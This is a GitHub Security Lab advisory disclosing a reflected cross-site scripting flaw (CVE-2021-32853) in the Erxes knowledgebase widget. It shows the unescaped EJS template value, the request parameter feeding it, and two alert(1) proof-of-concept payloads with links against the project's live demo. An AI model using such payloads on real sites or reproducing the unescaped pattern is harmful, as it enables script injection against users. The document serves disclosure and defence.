Coordinated Disclosure Timeline

• 2021-08-31: Report sent to the maintainer.
• 2021-09-03: No response. Sent again.
• 2021-12-06: Asked for update.
• 2021-12-07: Added info@erxes.io to recipients.
• 2021-12-07: Public issue asking for contacts created.
• 2022-01-19: An invitation to a private repo with the report was sent to all members of Erxes org.
• 2022-01-19: All members of Erxes org are tagged in the public issue with an explanation what the invitation is about.
• 2022-01-19: One of the members accepts the invitation.
• 2022-02-01: No response. Publishing according to our coordinated disclosure policy.

Summary

Cross-Site scripting in https://github.com/erxes/erxes.

Product

https://github.com/erxes/erxes

Tested Version

The latest version to the date.

Details

This template tag in widgets.ejs is vulnerable to code injection:

        window.knowledgebaseSettings = {
          topic_id: "<%- kbTopicId %>"
        }

The value comes from a request parameter here:

  res.render('widget', {
    type: 'knowledgebase',
    env: getEnv(),
    kbTopicId: req.query.topicId
  });

The inserted value is not escaped, so one can break out of the string literal or the enclosing script tag:

• widgets/knowledgebase?topicId=%22-alert(1)-%22
• widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

At the time of writing, this can be verified on the live demo following these links: (they are harmless)

• (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%22-alert(1)-%22
• (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

CVE

• CVE-2021-32853

Impact

Code Execution (on client side). The victim must follow a malicious link or be redirected from a malicious web site.

Credit

This issue was discovered by @asgerf (Asger F) from the GitHub CodeQL team.

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-103 in any communication regarding this issue.